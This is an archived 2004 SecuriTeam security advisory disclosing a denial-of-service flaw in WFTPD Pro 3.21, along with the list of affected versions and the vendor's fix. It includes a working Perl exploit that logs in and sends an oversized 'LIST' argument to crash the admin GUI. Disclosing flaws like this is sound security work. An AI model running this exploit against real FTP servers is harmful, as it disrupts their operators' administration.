[NT] WFTPD GUI DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 03/17/04

  • Next message: SecuriTeam: "[NT] GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)"
    To: list@securiteam.com
    Date: 17 Mar 2004 18:18:58 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      WFTPD GUI DoS
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in WFTPD Pro allows a user issuing a long parameter
    (around 300 bytes) as a value for almost all commands, to cause a DoS
    attack against the controlling GUI of the WFTP Pro product. Once the
    attack has been launched, an administrator can no longer open the GUI and
    see the current connected users.

    DETAILS

    Vulnerable Systems:
     * WFTPD version 3.21 Release 2
     * WFTPD version 3.21 Release 1

    Immune Systems:
     * WFTPD version 3.21 Release 3

    Vendor Status:
    WFTPD Pro 3.21 Release 3 is released on March 16, 2004, to fix a potential
    denial-of-service attack on the Control Panel applet discovered by STORM
    <storm[at]securiteam[dot]com>. Also changed in this version - the output
    to the control panel applet is changed to being sent only when a command
    executes.

    Exploit:
    #!/usr/bin/perl
    # Multiple Vulnerabilities in WFTPD FTP Server version 3.21.1
    # Created by Beyond Security Ltd. - All rights reserved.

    use IO::Socket;

    $host = "192.168.1.243";

    $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
    PeerPort => "2119");

    unless ($remote) { die "cannot connect to ftp daemon on $host" }

    print "connected\n";
    while (<$remote>)
    {
     print $_;
     if (/220 /)
     {
      last;
     }
    }

    $remote->autoflush(1);

    my $ftp = "USER username\r\n";

    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/331 /)
     {
      last;
     }
    }

    $ftp = join("", "PASS ", "password", "\r\n");
    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/230 /)
     {
      last;
     }
    }

    $ftp = join ("", "LIST ", "A"x260, "\r\n"); # DoS ...

    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/250 Done/)
     {
      last;
     }
    }

    close $remote;

    ADDITIONAL INFORMATION

    SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
    finding this vulnerability.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)"

    Relevant Pages

    • [NT] Microsoft wininet.dll FTP Reply Null Termination Heap Corruption Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft 'wininet.dll' FTP Reply Null Termination Heap Corruption ... Windows Server 2003 Enterprise Edition SP1 ... This vulnerability appears to have existed from at least Internet ...
      (Securiteam)
    • [EXPL] CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... FTP program that makes it easy to drag and drop files to and from your ... CoffeeCup FTP to execute arbitrary code. ... direct | free "direct" to exploit a CoffeeCup Direct FTP client ...
      (Securiteam)
    • [UNIX] FTP Kioslave Command Injection
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... KDE applications which use the FTP kioslave, e.g. Konqueror, allow remote ... The FTP kioslave can be misused to execute any ftp command on the server ...
      (Securiteam)
    • [NT] ArGoSoft FTP Server XCMD Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ArGoSoft FTP Server is ...
      (Securiteam)
    • [NEWS] Multiple Vulnerabilities in the QNX Platform
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... QNX 6.1 FTP client is vulnerable to a format string in 'quote' command. ... Memory fault ... there is a theoretical race condition vulnerability. ...
      (Securiteam)